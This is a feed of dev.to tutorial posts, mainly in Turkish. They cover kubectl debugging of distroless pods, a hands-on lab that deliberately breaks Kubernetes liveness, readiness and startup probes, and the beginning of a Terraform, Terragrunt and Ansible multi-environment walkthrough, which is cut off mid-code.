<pre class="highlight shell"><code>kubectl debug distroless-pod <span class="se">\</span> <span class="nt">--image</span><span class="o">=</span>busybox <span class="se">\</span> <span class="nt">--copy-to</span><span class="o">=</span>distroless-pod-debug <span class="se">\</span> <span class="nt">-it</span> </code></pre> </div> <p>Bu komut pod'un birebir kopyasını oluşturuyor, içine busybox ekliyor, oraya bağlanıyor. Debug bitince:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>kubectl delete pod distroless-pod-debug </code></pre> </div> <h2> Node Seviyesinde Debug </h2> <p>Bazen pod seviyesi yetmez — kernel parametreleri, node'daki tüm process'ler, host network. Bunun için node'u debug edersin:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>kubectl debug node/desktop-control-plane <span class="se">\</span> <span class="nt">-it</span> <span class="se">\</span> <span class="nt">--image</span><span class="o">=</span>busybox </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Node'daki tüm process'ler</span> ps aux | <span class="nb">head</span> <span class="nt">-20</span> <span class="c"># Node'un dosya sistemi /host altında</span> <span class="nb">ls</span> /host <span class="c"># Kernel bilgisi</span> <span class="nb">uname</span> <span class="nt">-a</span> <span class="nb">exit</span> </code></pre> </div> <h2> Pod Debug vs Node Debug </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th></th> <th>Pod Debug</th> <th>Node Debug</th> </tr> </thead> <tbody> <tr> <td>Ne zaman</td> <td>Uygulama seviyesi sorunlar</td> <td>Altyapı seviyesi sorunlar</td> </tr> <tr> <td>Erişim</td> <td>Container process'leri</td> <td>Tüm node</td> </tr> <tr> <td>Komut</td> <td><code>kubectl debug pod/...</code></td> <td><code>kubectl debug node/...</code></td> </tr> </tbody> </table></div> <h2> Production Best Practices </h2> <p><strong>Multi-stage build her zaman kullan:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight docker"><code><span class="c"># Builder — tüm araçlar burada, final image'a gitmez</span> <span class="k">FROM</span><span class="w"> </span><span class="s">golang:1.21</span><span class="w"> </span><span class="k">AS</span><span class="w"> </span><span class="s">builder</span> <span class="k">WORKDIR</span><span class="s"> /app</span> <span class="k">COPY</span><span class="s"> . .</span> <span class="k">RUN </span><span class="nv">CGO_ENABLED</span><span class="o">=</span>0 go build <span class="nt">-o</span> server . <span class="c"># Runtime — sadece binary</span> <span class="k">FROM</span><span class="s"> gcr.io/distroless/static</span> <span class="k">COPY</span><span class="s"> --from=builder /app/server /server</span> <span class="k">ENTRYPOINT</span><span class="s"> ["/server"]</span> </code></pre> </div> <p><strong>nonroot tag kullan:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight docker"><code><span class="c"># Root olarak çalışma</span> <span class="k">FROM</span><span class="s"> gcr.io/distroless/static-debian12:nonroot</span> </code></pre> </div> <p><strong>debug tag sadece geliştirmede:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight docker"><code><span class="c"># Production</span> <span class="k">FROM</span><span class="s"> gcr.io/distroless/static</span> <span class="c"># Development — busybox shell içeriyor, production'da kullanma</span> <span class="k">FROM</span><span class="s"> gcr.io/distroless/static:debug</span> </code></pre> </div> <h2> Öğrendiklerim </h2> <p>Bu lab'dan önce distroless'ı "image boyutunu küçülten bir şey" olarak görüyordum. Şimdi şunu söyleyebiliyorum:</p> <p>Boyut küçülmesi yan kazanım. Asıl kazanım attack surface'in minimuma inmesi. Shell yok, paket manager yok, sistem araçları yok — container ele geçirilse bile saldırganın yapabileceği şey çok kısıtlı.</p> <p>kubectl exec çalışmaması sinir bozucu görünüyor ama doğru soruyu sormak gerekiyor: "Ben giremiyorsam saldırgan da giremez mi?" Evet, giremez. Debug için kubectl debug var — production pod'una dokunmadan ephemeral container ile istediğini yapabilirsin.</p> <p><em>Bu yazı, bir mülakattan aldığım geri bildirimi uygulamalı olarak çalışma serim.</em><br> <em>Serinin diğer yazıları:</em></p> <ul> <li><em><a href="https://dev.to/tahayagizguler/terraform-terragrunt-ansible-a-hands-on-learning-journey-jed">Terraform + Terragrunt + Ansible: A Hands-On Learning Journey</a></em></li> <li><em><a href="https://dev.to/tahayagizguler/kubernetes-probelarini-bozarak-ogrenmek-liveness-readiness-ve-startup-3meh">Kubernetes Probe'larını Kasıtlı Bozarak Öğrendim</a></em></li> <li><em><a href="https://dev.to/tahayagizguler/container-icine-giremiyorum-ve-bu-iyi-bir-sey-distroless-imagelar-hik">Container İçine Giremiyorum — Ve Bu İyi Bir Şey: Distroless Image'lar</a></em></li> <li><em><a href="https://dev.to/tahayagizguler/prometheus-ve-grafanayi-derinlemesine-anlamak-tsdb-promql-ve-custom-exporter-1enp">Prometheus ve Grafana'yı Derinlemesine Anlamak</a></em></li> </ul> kubernetes docker devops güvenlik Kubernetes Probe'larını Bozarak Öğrenmek — Liveness, Readiness ve Startup Taha Yağız Güler Tue, 26 May 2026 10:53:18 +0000 https://dev.to/tahayagizguler/kubernetes-probelarini-bozarak-ogrenmek-liveness-readiness-ve-startup-3meh https://dev.to/tahayagizguler/kubernetes-probelarini-bozarak-ogrenmek-liveness-readiness-ve-startup-3meh <h2> Probe nedir, neden gerekli? </h2> <p>Kubernetes bir pod'un "çalışıyor" olduğunu bilir — container ayaktaysa çalışıyor demek. Ama "çalışıyor" ile "sağlıklı" aynı şey değil. Uygulama deadlock'a girmiş olabilir, DB bağlantısını kaybetmiş olabilir, henüz başlamayı tamamlamamış olabilir.</p> <p>Probe'lar Kubernetes'e şunu söyler: "Bu container'ın içindeki uygulamayı benim istediğim şekilde kontrol et."</p> <p>Üç probe türü var, her biri farklı bir soruyu cevaplıyor:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Probe</th> <th>Soru</th> <th>Başarısız olursa</th> </tr> </thead> <tbody> <tr> <td>Startup</td> <td>Uygulama başladı mı?</td> <td>Pod restart</td> </tr> <tr> <td>Readiness</td> <td>Traffic almaya hazır mı?</td> <td>Traffic kesilir, pod durmaz</td> </tr> <tr> <td>Liveness</td> <td>Uygulama sağlıklı mı?</td> <td>Pod restart</td> </tr> </tbody> </table></div> <p>En kritik fark readiness ile liveness arasında — birinde pod ölür, diğerinde ölmez.</p> <h2> Lab ortamı </h2> <p>Docker Desktop üzerinde kind cluster, tek node:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>kind create cluster <span class="nt">--name</span> probe-lab kubectl create namespace probe-lab kubectl config set-context <span class="nt">--current</span> <span class="nt">--namespace</span><span class="o">=</span>probe-lab </code></pre> </div> <h2> Senaryo 1 — Bozuk Liveness Probe </h2> <p>Nginx 80 portunda çalışıyor ama liveness probe 9999'a bakıyor. Ne olacak?<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">apiVersion</span><span class="pi">:</span> <span class="s">apps/v1</span> <span class="na">kind</span><span class="pi">:</span> <span class="s">Deployment</span> <span class="na">metadata</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">liveness-broken</span> <span class="na">namespace</span><span class="pi">:</span> <span class="s">probe-lab</span> <span class="na">spec</span><span class="pi">:</span> <span class="na">replicas</span><span class="pi">:</span> <span class="m">1</span> <span class="na">selector</span><span class="pi">:</span> <span class="na">matchLabels</span><span class="pi">:</span> <span class="na">app</span><span class="pi">:</span> <span class="s">liveness-broken</span> <span class="na">template</span><span class="pi">:</span> <span class="na">metadata</span><span class="pi">:</span> <span class="na">labels</span><span class="pi">:</span> <span class="na">app</span><span class="pi">:</span> <span class="s">liveness-broken</span> <span class="na">spec</span><span class="pi">:</span> <span class="na">containers</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">nginx</span> <span class="na">image</span><span class="pi">:</span> <span class="s">nginx:alpine</span> <span class="na">ports</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">containerPort</span><span class="pi">:</span> <span class="m">80</span> <span class="na">livenessProbe</span><span class="pi">:</span> <span class="na">httpGet</span><span class="pi">:</span> <span class="na">path</span><span class="pi">:</span> <span class="s">/</span> <span class="na">port</span><span class="pi">:</span> <span class="m">9999</span> <span class="c1"># nginx burada dinlemiyor</span> <span class="na">initialDelaySeconds</span><span class="pi">:</span> <span class="m">5</span> <span class="na">periodSeconds</span><span class="pi">:</span> <span class="m">5</span> <span class="na">failureThreshold</span><span class="pi">:</span> <span class="m">3</span> <span class="c1"># 3 başarısız → restart</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>kubectl apply <span class="nt">-f</span> liveness-broken.yaml kubectl get pods <span class="nt">-w</span> </code></pre> </div> <p>Çıktı:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">NAME READY STATUS RESTARTS AGE liveness-broken-xxx 1/1 Running 0 8s liveness-broken-xxx 1/1 Running 1 23s liveness-broken-xxx 1/1 Running 2 38s liveness-broken-xxx 0/1 CrashLoopBackOff 3 53s </span></code></pre> </div> <p>Events'e bakınca:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Warning Unhealthy Liveness probe failed: dial tcp: connection refused Warning Killing Container failed liveness probe, will be restarted </code></pre> </div> <p><strong>Ne öğrendim:</strong> Liveness başarısız olunca Kubernetes container'ı öldürüp yeniden başlatıyor. Ama sorun devam ettiği için sonsuz döngüye giriyor — buna <code>CrashLoopBackOff</code> deniyor. Production'da bu alarm tetikler, on-call mühendisi uyandırır.</p> <h2> Senaryo 2 — Bozuk Readiness Probe </h2> <p>Aynı nginx, bu sefer readiness probe var olmayan bir path'e bakıyor: <code>/nonexistent</code>. Liveness doğru. Ne olacak?<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">livenessProbe</span><span class="pi">:</span> <span class="na">httpGet</span><span class="pi">:</span> <span class="na">path</span><span class="pi">:</span> <span class="s">/</span> <span class="c1"># doğru — pod ölmeyecek</span> <span class="na">port</span><span class="pi">:</span> <span class="m">80</span> <span class="na">readinessProbe</span><span class="pi">:</span> <span class="na">httpGet</span><span class="pi">:</span> <span class="na">path</span><span class="pi">:</span> <span class="s">/nonexistent</span> <span class="c1"># 404 dönecek — probe başarısız</span> <span class="na">port</span><span class="pi">:</span> <span class="m">80</span> <span class="na">initialDelaySeconds</span><span class="pi">:</span> <span class="m">3</span> <span class="na">periodSeconds</span><span class="pi">:</span> <span class="m">5</span> <span class="na">failureThreshold</span><span class="pi">:</span> <span class="m">3</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>kubectl get pods <span class="nt">-w</span> </code></pre> </div> <p>Çıktı:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">NAME READY STATUS RESTARTS AGE readiness-broken-xxx 0/1 Running 0 10s readiness-broken-xxx 0/1 Running 0 60s readiness-broken-xxx 0/1 Running 0 2m </span></code></pre> </div> <p><code>RESTARTS</code> hiç artmıyor. Pod ölmüyor. Ama <code>0/1</code> — traffic almıyor.</p> <p>Service endpoint'e bakınca:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>kubectl get endpoints readiness-broken </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">NAME ENDPOINTS AGE </span><span class="gp">readiness-broken &lt;none&gt;</span><span class="w"> </span>2m </code></pre> </div> <p><code>&lt;none&gt;</code> — Kubernetes bu pod'u endpoint listesinden çıkardı. Hiçbir istek buraya gelmiyor.</p> <p><strong>Ne öğrendim:</strong> Readiness ile liveness'ın farkı tam burada netleşiyor. Liveness başarısız → pod restart. Readiness başarısız → pod Running kalıyor, sadece traffic kesiliyor. Pod'u öldürmek her zaman doğru cevap değil — bazen sadece "biraz bekle, hazır olunca gönder" demek yeterli.</p> <h2> Senaryo 3 — Startup Probe Olmadan Yavaş Uygulama </h2> <p>Uygulama başlamak için 40 saniye bekliyor. Startup probe yok, liveness 20 saniyede restart ediyor.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">lifecycle</span><span class="pi">:</span> <span class="na">postStart</span><span class="pi">:</span> <span class="na">exec</span><span class="pi">:</span> <span class="na">command</span><span class="pi">:</span> <span class="pi">[</span><span class="s2">"</span><span class="s">/bin/sh"</span><span class="pi">,</span> <span class="s2">"</span><span class="s">-c"</span><span class="pi">,</span> <span class="s2">"</span><span class="s">sleep</span><span class="nv"> </span><span class="s">40"</span><span class="pi">]</span> <span class="c1"># 40 saniye beklet</span> <span class="na">livenessProbe</span><span class="pi">:</span> <span class="na">httpGet</span><span class="pi">:</span> <span class="na">path</span><span class="pi">:</span> <span class="s">/</span> <span class="na">port</span><span class="pi">:</span> <span class="m">80</span> <span class="na">initialDelaySeconds</span><span class="pi">:</span> <span class="m">5</span> <span class="na">periodSeconds</span><span class="pi">:</span> <span class="m">5</span> <span class="na">failureThreshold</span><span class="pi">:</span> <span class="m">3</span> <span class="c1"># 5 + (3*5) = 20 saniyede restart</span> <span class="c1"># uygulama 40 saniyede hazır — hiç hazır olamaz</span> </code></pre> </div> <p>Sonuç: <code>CrashLoopBackOff</code>. Uygulama hiç ayağa kalkamıyor çünkü liveness onu hazır olmadan öldürüyor.</p> <p>Şimdi startup probe ekle:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">startupProbe</span><span class="pi">:</span> <span class="na">httpGet</span><span class="pi">:</span> <span class="na">path</span><span class="pi">:</span> <span class="s">/</span> <span class="na">port</span><span class="pi">:</span> <span class="m">80</span> <span class="na">periodSeconds</span><span class="pi">:</span> <span class="m">5</span> <span class="na">failureThreshold</span><span class="pi">:</span> <span class="m">12</span> <span class="c1"># 12 * 5 = 60 saniye bekler</span> <span class="c1"># startup geçene kadar liveness çalışmaz</span> <span class="na">livenessProbe</span><span class="pi">:</span> <span class="na">httpGet</span><span class="pi">:</span> <span class="na">path</span><span class="pi">:</span> <span class="s">/</span> <span class="na">port</span><span class="pi">:</span> <span class="m">80</span> <span class="na">initialDelaySeconds</span><span class="pi">:</span> <span class="m">5</span> <span class="na">periodSeconds</span><span class="pi">:</span> <span class="m">10</span> <span class="na">failureThreshold</span><span class="pi">:</span> <span class="m">3</span> </code></pre> </div> <p>Sonuç:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">NAME READY STATUS RESTARTS slow-app-fixed-xxx 1/1 Running 0 ← restart yok </span></code></pre> </div> <p><strong>Ne öğrendim:</strong> Startup probe, liveness için bir "koruma kalkanı" görevi görüyor. "Ben hazır olana kadar dokunma" diyor. Spring Boot, JVM tabanlı uygulamalar, büyük model yükleyen ML servisleri — bunların hepsinde startup probe zorunlu.</p> <h2> Senaryo 4 — HPA ile Readiness Entegrasyonu </h2> <p>Bu senaryoda yük testi yaparak HPA'yı tetikledim ve yeni açılan pod'ların readiness geçene kadar traffic almadığını gözlemledim.</p> <p>Önce metrics-server'ı kur:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>kubectl apply <span class="nt">-f</span> https://github.com/kubernetes-sigs/metrics-server/releases/latest/download/components.yaml kubectl patch deployment metrics-server <span class="se">\</span> <span class="nt">-n</span> kube-system <span class="se">\</span> <span class="nt">--type</span><span class="o">=</span><span class="s1">'json'</span> <span class="se">\</span> <span class="nt">-p</span><span class="o">=</span><span class="s1">'[{"op":"add","path":"/spec/template/spec/containers/0/args/-","value":"--kubelet-insecure-tls"}]'</span> </code></pre> </div> <p>HPA tanımı:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">apiVersion</span><span class="pi">:</span> <span class="s">autoscaling/v2</span> <span class="na">kind</span><span class="pi">:</span> <span class="s">HorizontalPodAutoscaler</span> <span class="na">metadata</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">hpa-demo</span> <span class="na">spec</span><span class="pi">:</span> <span class="na">scaleTargetRef</span><span class="pi">:</span> <span class="na">apiVersion</span><span class="pi">:</span> <span class="s">apps/v1</span> <span class="na">kind</span><span class="pi">:</span> <span class="s">Deployment</span> <span class="na">name</span><span class="pi">:</span> <span class="s">hpa-demo</span> <span class="na">minReplicas</span><span class="pi">:</span> <span class="m">1</span> <span class="na">maxReplicas</span><span class="pi">:</span> <span class="m">4</span> <span class="na">metrics</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">type</span><span class="pi">:</span> <span class="s">Resource</span> <span class="na">resource</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">cpu</span> <span class="na">target</span><span class="pi">:</span> <span class="na">type</span><span class="pi">:</span> <span class="s">Utilization</span> <span class="na">averageUtilization</span><span class="pi">:</span> <span class="m">20</span> </code></pre> </div> <p>Yük testi:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>kubectl run load-generator <span class="se">\</span> <span class="nt">--image</span><span class="o">=</span>busybox:1.28 <span class="se">\</span> <span class="nt">--restart</span><span class="o">=</span>Never <span class="se">\</span> <span class="nt">-n</span> probe-lab <span class="se">\</span> <span class="nt">--</span> /bin/sh <span class="nt">-c</span> <span class="s2">"while true; do wget -q -O- http://hpa-demo; done"</span> </code></pre> </div> <p>HPA çıktısı:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">NAME TARGETS REPLICAS hpa-demo 2%/20% 1 hpa-demo 198%/20% 2 ← scale-out başladı hpa-demo 156%/20% 4 hpa-demo 2%/20% 4 hpa-demo 2%/20% 1 ← scale-in, yük durdu </span></code></pre> </div> <p>Yeni pod açılırken endpoint listesi:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">NAME ENDPOINTS hpa-demo 10.x.x.x:80 ← sadece hazır pod hpa-demo 10.x.x.x:80,10.x.x.x:80 ← ikinci pod readiness geçince eklendi </span></code></pre> </div> <p><strong>Ne öğrendim:</strong> HPA pod açtığında o pod hemen traffic almıyor. Readiness probe geçene kadar endpoint listesine girmiyor. Bu çok kritik — yük altında açılan pod hazır olmadan traffic alırsa hata oranı artar. Readiness probe bu geçiş sürecini güvenli hale getiriyor.</p> <h2> Production'da Dikkat Ettiğim Şeyler </h2> <p><strong>Liveness probe'a bağımlı servis kontrolü koyma:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="c1"># YANLIŞ — DB geçici kapanırsa tüm pod'lar cascade restart yapar</span> <span class="na">livenessProbe</span><span class="pi">:</span> <span class="na">httpGet</span><span class="pi">:</span> <span class="na">path</span><span class="pi">:</span> <span class="s">/health/db</span> <span class="na">port</span><span class="pi">:</span> <span class="m">8080</span> <span class="c1"># DOĞRU — liveness sadece "ben ayaktayım" sorusunu sormalı</span> <span class="na">livenessProbe</span><span class="pi">:</span> <span class="na">httpGet</span><span class="pi">:</span> <span class="na">path</span><span class="pi">:</span> <span class="s">/health/live</span> <span class="na">port</span><span class="pi">:</span> <span class="m">8080</span> <span class="na">readinessProbe</span><span class="pi">:</span> <span class="na">httpGet</span><span class="pi">:</span> <span class="na">path</span><span class="pi">:</span> <span class="s">/health/ready</span> <span class="c1"># DB bağlantısı burada kontrol edilir</span> <span class="na">port</span><span class="pi">:</span> <span class="m">8080</span> </code></pre> </div> <p><strong>Threshold değerlerini varsayılan bırakma:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">livenessProbe</span><span class="pi">:</span> <span class="na">failureThreshold</span><span class="pi">:</span> <span class="m">5</span> <span class="c1"># 3 değil — geçici ağ sorunlarına tolerans</span> <span class="na">periodSeconds</span><span class="pi">:</span> <span class="m">10</span> <span class="na">timeoutSeconds</span><span class="pi">:</span> <span class="m">5</span> <span class="c1"># 1 saniye çok kısa</span> </code></pre> </div> <p><strong>Startup probe'u atlama:</strong> Eğer uygulamanın başlangıç süresi değişkense — farklı ortamlarda farklı sürebiliyorsa — startup probe yaz. <code>initialDelaySeconds</code> ile tahmin yürütmek yerine gerçek hazırlık durumunu kontrol et.</p> <h2> Özet </h2> <p>Bu lab'dan önce probe'ları biliyordum ama gözlemlememştim. Şimdi şunu rahatlıkla söyleyebiliyorum:</p> <ul> <li> <strong>Liveness</strong> → "uygulama dondu mu?" — başarısız olursa restart</li> <li> <strong>Readiness</strong> → "traffic almaya hazır mı?" — başarısız olursa sadece traffic kesilir</li> <li> <strong>Startup</strong> → "uygulama başlamayı tamamladı mı?" — liveness için koruma kalkanı</li> </ul> <p>Ve en önemli şey: readiness ile liveness'ı aynı endpoint'e bağlamak işe yarıyor ama doğru değil. İkisi farklı soruları soruyor, farklı endpoint'ler hak ediyorlar.</p> <p><em>Bu yazı, bir mülakattan aldığım geri bildirimi uygulamalı olarak çalışma serim.</em><br> <em>Serinin diğer yazıları:</em></p> <ul> <li><em><a href="https://dev.to/tahayagizguler/terraform-terragrunt-ansible-a-hands-on-learning-journey-jed">Terraform + Terragrunt + Ansible: A Hands-On Learning Journey</a></em></li> <li><em><a href="https://dev.to/tahayagizguler/kubernetes-probelarini-bozarak-ogrenmek-liveness-readiness-ve-startup-3meh">Kubernetes Probe'larını Kasıtlı Bozarak Öğrendim</a></em></li> <li><em><a href="https://dev.to/tahayagizguler/container-icine-giremiyorum-ve-bu-iyi-bir-sey-distroless-imagelar-hik">Container İçine Giremiyorum — Ve Bu İyi Bir Şey: Distroless Image'lar</a></em></li> <li><em><a href="https://dev.to/tahayagizguler/prometheus-ve-grafanayi-derinlemesine-anlamak-tsdb-promql-ve-custom-exporter-1enp">Prometheus ve Grafana'yı Derinlemesine Anlamak</a></em></li> </ul> kubernetes devops docker cloud Terraform + Terragrunt + Ansible: A Hands-On Learning Journey Taha Yağız Güler Mon, 25 May 2026 10:55:04 +0000 https://dev.to/tahayagizguler/terraform-terragrunt-ansible-a-hands-on-learning-journey-jed https://dev.to/tahayagizguler/terraform-terragrunt-ansible-a-hands-on-learning-journey-jed <p>I recently got interview feedback that changed how I approach learning:</p> <blockquote> <p><em>"You've used these tools, but the technical depth wasn't there."</em></p> </blockquote> <p>Instead of just reading documentation, I decided to build a real multi-environment infrastructure setup from scratch — dev, staging, and prod — using Terraform, Terragrunt, and Ansible. This post is a walkthrough of what I built, why each decision was made, and what I actually learned along the way.</p> <h2> The Problem with Single-Environment Thinking </h2> <p>Up until this point, my Terraform workflow looked like this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>write main.tf → terraform apply → done </code></pre> </div> <p>That works fine for a single environment. But in a real company, code never goes directly to production. There's always a pipeline:</p> <ul> <li> <strong>Dev</strong> — developers experiment here, things can break, no real users</li> <li> <strong>Staging</strong> — production mirror, QA tests here before release</li> <li> <strong>Prod</strong> — real users, real traffic, every mistake costs something</li> </ul> <p>When you try to scale your single <code>main.tf</code> to three environments, three problems appear immediately.</p> <p><strong>Problem 1: Code duplication.</strong> You copy <code>main.tf</code> into <code>environments/dev</code>, <code>environments/staging</code>, and <code>environments/prod</code>. Now you have three identical files. When you add a new resource to dev, you have to manually copy it to the other two. Forget once — your environments silently drift apart.</p> <p><strong>Problem 2: State file collisions.</strong> Terraform saves the current state of your infrastructure to a file called <code>terraform.tfstate</code>. If all three environments write to the same S3 path, a <code>dev</code> apply can overwrite the <code>prod</code> state. Infrastructure gone.</p> <p><strong>Problem 3: No access control.</strong> Without IAM isolation, any engineer with AWS credentials can accidentally run <code>terragrunt apply</code> in the wrong environment.</p> <p>These are the three problems this lab is designed to solve.</p> <h2> Project Architecture </h2> <p>Here's the full directory structure we're building:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>terraform-ansible/ ├── _base │ ├── main.tf # single Terraform entry point, used by all environments │ └── modules │ ├── ec2 │ │ ├── main.tf │ │ ├── outputs.tf │ │ └── variables.tf │ ├── sg │ │ ├── main.tf │ │ ├── outputs.tf │ │ └── variables.tf │ └── vpc │ ├── main.tf │ ├── outputs.tf │ └── variables.tf ├── ansible │ ├── ansible.cfg │ ├── group_vars │ │ ├── env_dev.yml │ │ ├── env_prod.yml │ │ └── env_staging.yml │ ├── inventory │ │ └── aws_ec2.yml # dynamic inventory — AWS tag based │ ├── playbooks │ │ └── provision.yml │ └── roles │ ├── common │ │ └── tasks │ │ └── main.yml │ └── webserver │ ├── handlers │ │ └── main.yml │ └── tasks │ └── main.yml └── live ├── dev │ └── terragrunt.hcl # dev-specific values ├── prod │ └── terragrunt.hcl # prod-specific values ├── staging │ └── terragrunt.hcl # staging-specific values └── terragrunt.hcl # root config — S3 backend, state locking </code></pre> </div> <p>The flow looks like this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>terragrunt apply (live/dev) │ ├── reads live/terragrunt.hcl → generates backend.tf automatically ├── reads live/dev/terragrunt.hcl → gets environment-specific inputs ├── runs _base/main.tf → provisions VPC, SG, EC2 └── triggers null_resource → runs Ansible playbook automatically </code></pre> </div> <h2> Step 1: Terraform Modules — Reusable Infrastructure Components </h2> <p>Modules are Terraform's way of packaging reusable infrastructure. Instead of writing the same VPC configuration in every environment, you write it once as a module and call it with different parameters.</p> <p>Each module follows the same three-file pattern:</p> <ul> <li> <code>variables.tf</code> — what inputs the module accepts</li> <li> <code>main.tf</code> — what resources it creates</li> <li> <code>outputs.tf</code> — what values it exposes to the caller</li> </ul> <p>Here's the EC2 module as an example:</p> <p><strong><code>modules/ec2/variables.tf</code></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">variable</span> <span class="s2">"instance_type"</span> <span class="p">{</span> <span class="nx">description</span> <span class="p">=</span> <span class="s2">"EC2 instance type"</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">string</span> <span class="p">}</span> <span class="nx">variable</span> <span class="s2">"environment"</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">string</span> <span class="p">}</span> <span class="nx">variable</span> <span class="s2">"subnet_id"</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">string</span> <span class="p">}</span> <span class="nx">variable</span> <span class="s2">"sg_id"</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">string</span> <span class="p">}</span> <span class="nx">variable</span> <span class="s2">"key_name"</span> <span class="p">{</span> <span class="nx">description</span> <span class="p">=</span> <span class="s2">"SSH key pair name"</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">string</span> <span class="p">}</span> </code></pre> </div> <p><strong><code>modules/ec2/main.tf</code></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">data</span> <span class="s2">"aws_ami"</span> <span class="s2">"amazon_linux"</span> <span class="p">{</span> <span class="nx">most_recent</span> <span class="p">=</span> <span class="kc">true</span> <span class="nx">owners</span> <span class="p">=</span> <span class="p">[</span><span class="s2">"amazon"</span><span class="p">]</span> <span class="nx">filter</span> <span class="p">{</span> <span class="nx">name</span> <span class="p">=</span> <span class="s2">"name"</span> <span class="nx">values</span> <span class="p">=</span> <span class="p">[</span><span class="s2">"al2023-ami-*-x86_64"</span><span class="p">]</span> <span class="p">}</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_instance"</span> <span class="s2">"main"</span> <span class="p">{</span> <span class="nx">ami</span> <span class="p">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">aws_ami</span><span class="p">.</span><span class="nx">amazon_linux</span><span class="p">.</span><span class="nx">id</span> <span class="nx">instance_type</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">instance_type</span> <span class="nx">subnet_id</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">subnet_id</span> <span class="nx">vpc_security_group_ids</span> <span class="p">=</span> <span class="p">[</span><span class="nx">var</span><span class="p">.</span><span class="nx">sg_id</span><span class="p">]</span> <span class="nx">key_name</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">key_name</span> <span class="nx">tags</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">Name</span> <span class="p">=</span> <span class="s2">"${var.environment}-server"</span> <span class="nx">Environment</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">environment</span> <span class="nx">ManagedBy</span> <span class="p">=</span> <span class="s2">"terraform"</span> <span class="nx">Project</span> <span class="p">=</span> <span class="s2">"terraform-lab"</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p><strong><code>modules/ec2/outputs.tf</code></strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">output</span> <span class="s2">"instance_id"</span> <span class="p">{</span> <span class="nx">value</span> <span class="p">=</span> <span class="nx">aws_instance</span><span class="p">.</span><span class="nx">main</span><span class="p">.</span><span class="nx">id</span> <span class="p">}</span> <span class="nx">output</span> <span class="s2">"public_ip"</span> <span class="p">{</span> <span class="nx">value</span> <span class="p">=</span> <span class="nx">aws_instance</span><span class="p">.</span><span class="nx">main</span><span class="p">.</span><span class="nx">public_ip</span> <span class="p">}</span> </code></pre> </div> <p>The VPC and Security Group modules follow the same pattern. The key insight: modules are just functions. They take inputs, create resources, and return outputs.</p> <h2> Step 2: <code>_base/main.tf</code> — The Single Entry Point </h2> <p>All three environments use this exact file. It calls the modules and accepts all variable values from outside — from Terragrunt:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">terraform</span> <span class="p">{</span> <span class="nx">required_providers</span> <span class="p">{</span> <span class="nx">aws</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">source</span> <span class="p">=</span> <span class="s2">"hashicorp/aws"</span> <span class="nx">version</span> <span class="p">=</span> <span class="s2">"~&gt; 5.0"</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="nx">variable</span> <span class="s2">"environment"</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">string</span> <span 